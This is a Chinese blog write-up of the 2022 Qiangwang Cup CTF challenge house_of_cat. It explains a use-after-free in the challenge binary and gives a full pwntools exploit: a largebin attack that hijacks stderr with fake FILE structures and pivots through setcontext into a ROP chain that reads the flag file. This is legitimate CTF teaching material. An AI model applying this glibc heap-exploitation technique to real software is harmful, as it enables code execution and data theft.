[2022 强网杯] house_of_cat 战战兢兢的复现

最新推荐文章于 2024-07-03 17:02:32 发布
最新推荐文章于 2024-07-03 17:02:32 发布
阅读量345 收藏 2
点赞数
分类专栏: CTF pwn 文章标签: 2022 第六届 强网杯
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/126157319
版权

比赛结束后搜到WP,一点点复现一点点理解。

程序前边有个头,先要登录要配置一个串,然后每执行命令的时候都要输入一个串验证,好在每次都不变。所以手工配置出一个串来。这种串可能有好多配置方法,只要符合规则就行。

b'LOGIN | r00t QWBQWXF admin\x00'
b'CAT | r00t QWBQWXF $\xff\xff\xff\xff\x00'

然后就是菜单题了,建块的时候要求在418到46f之间,都不会进tcache

ssize_t m1_add()
{
  unsigned __int64 v1; // [rsp+0h] [rbp-10h]
  size_t size; // [rsp+8h] [rbp-8h]

  writen("plz input your cat idx:\n");
  v1 = (unsigned int)readn();
  if ( v1 > 0xF || *((_QWORD *)&unk_4060 + v1) )
    return writen("invalid!\n");
  writen("plz input your cat size:\n");
  size = (unsigned int)readn();
  if ( size <= 0x417 || size > 0x46F )
    return writen("invalid size!\n");
  *((_QWORD *)&unk_4060 + v1) = calloc(1uLL, size);
  if ( !*((_QWORD *)&unk_4060 + v1) )
    return writen("error!\n");
  qword_40E0[v1] = size;
  writen("plz input your content:\n");
  return read(0, *((void **)&unk_4060 + v1), qword_40E0[v1]);
}

删块的时候没有清理指针,这里有UAF漏洞

void m2_free()
{
  unsigned __int64 v0; // [rsp+8h] [rbp-8h]

  writen("plz input your cat idx:\n");
  v0 = (unsigned int)readn();
  if ( v0 <= 0xF && *((_QWORD *)&unk_4060 + v0) )
    free(*((void **)&unk_4060 + v0));
  else
    writen("invalid!\n");
}

然后就是一个largebinAttack但比赛的时候一直没调成,看别人的WP再调

基本思路就是将stderr指向fake虚表,通过虚表来执行ROP

  1. 建0,1,2然后释放0再建大块3这里0将从unsort放入largebin,由于有UAF可以泄漏这里的指针得到libc和堆地址
  2. 在0块写入fake_io1伪虚表,在这里写两个gadget来执行rop(这块也不明白,但如果是同样的题应该可以复制),并指向块7位置的fake_io2。
  3. 建8,7,6再释放6,7,8,9 。这里在两次largebinAttack后会将top_chunk挤到6可控的范围,然后通过6改小top_chunk让他执行stderr
  4. 6,7,8释放后会与top_chunk合并,9进入unsort。
  5. 建一个大块10让9(原来0块位置)进入largebin,然后释放2在largebin和unsort都准备好后可以开始修改largebin的指针来进行攻击,将这个指针改为stderr
  6. 这时候建一个大块写入fake_io2。这里还是个虚表,他会把执行位置指到2真的rop处(2现在还没写内容)。2位置的unsort会进入largebin并且会把2块的堆地址写入到stderr(并不是需要的,只是中间过程)
  7. 使用2块,因为2块到1块有largebin链,这里会将stderr的内容改为0块地址也就是fake_io1处。在2处写ROP(先关闭文件指针0,再从open(flag)文件到0然后读和输出)
from pwn import *

#patchelf --set-interpreter /home/shi/libc6_2.35-0ubuntu3/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 pwn
#patchelf --add-needed /home/shi/libc6_2.35-0ubuntu3/lib/x86_64-linux-gnu/libc.so.6  pwn


#LOGIN | r00t QWBQWXF admin
#CAT | r00t QWBQWXF $

elf = ELF('./pwn')
libc_elf = ELF('/home/shi/libc6_2.35-0ubuntu3/lib/x86_64-linux-gnu/libc.so.6')
context(arch='amd64', log_level='debug')

p = process('./pwn')


p.sendafter(b'~~~~\n', b'LOGIN | r00t QWBQWXF admin\x00')
menu = b"plz input your cat choice:\n"
def add(idx, size, msg, last=False):
    p.sendafter(b'~~~~\n', b'CAT | r00t QWBQWXF $\xff\xff\xff\xff\x00')
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"plz input your cat idx:\n", str(idx).encode())
    p.sendlineafter(b"plz input your cat size:\n", str(size).encode())
    if not last:
        p.sendafter(b"plz input your content:\n", msg)

def free(idx):   
    p.sendafter(b'~~~~\n', b'CAT | r00t QWBQWXF $\xff\xff\xff\xff\x00')
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"plz input your cat idx:\n", str(idx).encode())

def show(idx): 
    p.sendafter(b'~~~~\n', b'CAT | r00t QWBQWXF $\xff\xff\xff\xff\x00')
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"plz input your cat idx:\n", str(idx).encode())

def edit(idx, msg):
    p.sendafter(b'~~~~\n', b'CAT | r00t QWBQWXF $\xff\xff\xff\xff\x00')
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b"plz input your cat idx:\n", str(idx).encode())
    p.sendafter(b"plz input your content:\n", msg)

add(0, 0x428, b'AAAA')
add(1, 0x418, b'AAAA')
add(2, 0x418, b'AAAA')
free(0)
add(3, 0x438, b'AAAA')  #unsort 0 ,当建立的新块大小大于当前unsort块时unsort进入largebin,通过泄漏largebin的指针得到libc和堆地址
show(0)

'''
gef➤  x/20gx 0x290+0x0000557bcf5d6000
0x557bcf5d6290:	0x0000000000000000	0x0000000000000431
0x557bcf5d62a0:	0x00007f355fa690d0	0x00007f355fa690d0    <--- libc_base +0x21a0d0
0x557bcf5d62b0:	0x0000557bcf5d6290	0x0000557bcf5d6290    <--- heap_base +0x290
'''
p.recvuntil(b"Context:\n")
libc_base = u64(p.recv(8)) - 0x21a0d0
libc_elf.address = libc_base
print('libc:', hex(libc_base))

p.recv(8)
heap_base = u64(p.recv(8)) - 0x290
print('heap:', hex(heap_base))

#0x000000000007498c : mov rdx, r13 ; mov rsi, r12 ; mov rdi, r14 ; call qword ptr [rbx + 0x38]
#0x00000000001675b0 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
rop_addr=heap_base+0x1790  # #2--5  ->fake_io2  这里指向下一个vtable:fake_io2
fake_io1=p64(0)*5
fake_io1+=p64(libc_elf.sym['setcontext']+61)
fake_io1+=p64(0)*5
fake_io1+=p64(rop_addr)
fake_io1+=p64(2) + p64(0xffffffffffffffff)
fake_io1+=p64(0) + p64(libc_elf.address+0x21ba60)
fake_io1+=p64(0xffffffffffffffff) + p64(0)
fake_io1+=p64(heap_base+0x340)+p64(libc_elf.address+0x00000000001675b0) #mov_call_2
fake_io1+=p64(0)*2
fake_io1+=p64(1)
fake_io1+=p64(0)*2
fake_io1+=p64(libc_elf.sym['_IO_wfile_jumps']-0xc0-0x20) #io_wfile_jumps vtable
fake_io1+=p64(0)
fake_io1+=p64(libc_elf.sym['setcontext']+61)
fake_io1+=p64(0)*0x5
fake_io1+=p64(libc_elf.address+0x000000000007498c) #mov_call_1
fake_io1+=p64(0)*0xe
fake_io1+=p64(heap_base+0x340)
add(9, 0x428, fake_io1)  # #9==#0  使用largebin 无攻击, 写入fake vtable 

add(8, 0x428, b'A')
add(7, 0x438, b'A')
add(6, 0x418, b'A') #chunk6+8 = top_chunk_head  
free(6)
free(7)
free(8)  #6,7,8释放后会进入top_chunk 6的位置将来新建的块比7+8多10,使6可以修改到top_chunk_head
free(9)  #9=0释放到unsort
add(10, 0x438, b'A') # #8=#10, #0->largebin 再建比0大的块,0块进入largetbin
free(2)  #第2个块进入unsort
#LargebinAttack stderr->fake_io1
edit(0, flat(libc_base+0x21a0d0, libc_base+0x21a0d0, heap_base+0x290, libc_elf.sym['stderr']-0x20)) #修改largebin的指针指向stderr(指针有0x20的偏移)

pop_rdi = next(libc_elf.search(asm("pop rdi;ret")))
pop_rsi = next(libc_elf.search(asm("pop rsi;ret")))
pop_rdx_r12 = next(libc_elf.search(asm("pop rdx;pop r12;ret")))
pop_rax = next(libc_elf.search(asm("pop rax;ret")))
syscall = next(libc_elf.search(asm("syscall;ret")))

fake_io2=p64(0)+p64(rop_addr)
fake_io2+=p64(1)+p64(0)
fake_io2+=p64(libc_elf.sym['setcontext']+61)
fake_io2+=p64(0)*13
fake_io2+=p64(heap_base+0xae0)  # #2
fake_io2=fake_io2.ljust(0xa0, b'\x00')
fake_io2+=p64(heap_base+0xb00)+p64(pop_rdi+1) #ret

#0x7f5733e40860 <stderr>:	0x00007f5733e406a0
add(4,0x438,fake_io2)  #write fake_io2 , stderr->fake_io1   建大块时第1块的指针位置(stderr)写入0块的堆地址,同时2块进入largebin(指针处为0块的指针:stderr) 
#0x7f5733e40860 <stderr>:	0x000055c601ed2ae0
#gef➤  x/8gx 0x0000557c30983000+0xae0
#0x557c30983ae0:	0x0000000000000000	0x0000000000000421
#0x557c30983af0:	0x00007f742eff30d0	0x0000557c30983290
#0x557c30983b00:	0x0000557c30983290	0x00007f742eff3840

rop =b'./flag\x00\x00'+p64(0)
rop+=flat(pop_rdi,0, pop_rsi,0, pop_rdx_r12,0,0, pop_rax,3, syscall)   #close(0)
rop+=flat(pop_rdi,heap_base+0xaf0, pop_rsi,0, pop_rdx_r12,0,0, pop_rax,2, syscall)  #open(*flag,0)
rop+=flat(pop_rdi,0, pop_rsi,heap_base+0x1000, pop_rdx_r12,0x30,0, pop_rax,0, syscall)  #read(0,buf,0x30)
rop+=flat(pop_rdi,1, pop_rsi,heap_base+0x1000, pop_rdx_r12,0x30,0, pop_rax,1, syscall) #write(1, buf, 0x30)
add(5, 0x418, rop)    #使用当前largebin时指针处写入上前块的堆地址,实现 stderr->fake_io1
#0x7f5733e40860 <stderr>:	0x000055c601ed2290   stderr->fake_io1
#stderr->vtable:fake_io1指靠mov_call1,2 ->fake_io2 -> rop_chain
edit(6, p64(0)+p64(0x101)) #top_chunk_head = 0x101

add(0xf, 0x430, b'A', last=True) #440>100 no space -> stderr
print(p.recv())
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kc_house_data.rar
10-11
KC_House_Data.csv 文件是 King County(金县)的房价数据集,通常用于教学和实践机器学习项目,特别是在华盛顿大学的课程中。这个数据集包含了大量关于房屋特征和价格的信息,为初学者提供了理解如何利用统计和机器...
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
house of cat
tbsqigongzi的博客
09-01 587
2022强网杯 House of cat
house of cat 学习
m0_51251108的博客
10-13 1157
house of cat的利用链学习
2022强网杯house of cat
m0_63437215的博客
11-21 304
house of cat
2022强网杯pwn部分wp
N1rvana的博客
08-02 1500
2022强网杯pwn
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 2919
强网杯2022 pwn 赛题分析——house_of_cat
jj.rar_house_jjdsw txt
09-19
【描述】"Hello occurrence of the sofa couch Stephen Safar manual valve is time to kill the Orient House" 这句话看起来不太符合标准的中文语句,可能是拼写错误或者是引用自某段英文内容。不过,我们可以从中...
CDMA.RF.rar_ARTECH HOUSE_house_rf
09-14
《CDMA RF System Engineering》是Artech House出版的一本关于无线通信领域中码分多址(Code Division Multiple Access, CDMA)射频系统工程的专业书籍。这本书深入探讨了CDMA技术在射频系统设计和实施中的关键概念...
system_of_house_measure.rar_house
09-21
《房屋测量系统详解》 在数字化时代,房屋测量已经不再局限于传统的实地测量工具,而是借助先进的计算机技术,形成了一套高效、精准的房屋测量系统。本文将深入探讨这个系统的基本构成,以及它如何集成地图软件要素...
linux宝塔手记
cxs812760493的博客
11-14 1836
linux宝塔手记
house系1
njh18790816639的博客
08-09 327
参考:https://bbs.pediy.com/thread-273895.htm#msg_header_h1_0(提出了这种新的方式) 该文章虽然提出了新的手法,但是有些地方省略过多,故进行了调试分析,总结出完整的一个流程,分享给大家: 位于==/malloc/malloc.c之中可以发现__malloc_assert的定义,并且__assert_fail等同于__malloc_assert==,而==__assert宏定义调用了__assert_fail==: 可以发现首先执行==__fxprintf
Ubuntu20.04更新GLIBC到2.35版本
最新发布
flysnow010的博客
07-03 1033
Ubuntu20.04默认GLIBC库版本是2.31.今天碰到一个软件需要2.35版本的GLIBC。需要升级到2.35版本。
PWN学习之house of系列
qq_41071646的博客
08-09 1420
最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方, 然后 在一篇博客上发现了上面有讲东西并且练习题 很好 所以我就拿来联系了一把 并且记录一下 大概思路 house of spirit 这个wiki上好像没有 但是利用方法其实还是差不多的 这个主要就是 fastbin的利用 伪造一个堆块 然后让 free到这个堆块 让 伪造堆块进入...
强网杯2022 pwn 赛题解析——yakagame
CoLin的pwn小屋
07-31 3254
强网杯2022-pwn yakagame write-up
Ubuntu 22.04 LTS 解决 libc6-dev 缺少依赖 E: 软件包冲突的问题
热门推荐
xdz233的博客
10-23 1万+
Ubuntu 22.04 LTS libc6-dev 缺少依赖 E:软件包冲突
ACM 2015 北京网络赛 A题:The Cats' Feeding Spots
lchao_me的博客
04-05 255
http://hihocoder.com/contest/acmicpc2015beijingonline/problems 2015北京网络赛 题解 注意点不能在圆上,所以在取top的时候要ceil(d[i][n-1]+0.000000001)。一开始不懂得这么处理费了好长时间… #include<iostream> #include<cstdio> #inclu...
[2022 强网杯] devnull 复现
weixin_52640415的博客
08-05 372
2022 第六届 强网杯 devnull 移栈
强网杯2022 pwn 赛题解析——yakacmp
CoLin的pwn小屋
08-07 1012
强网杯2022 pwn 赛题解析——yakacmp
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值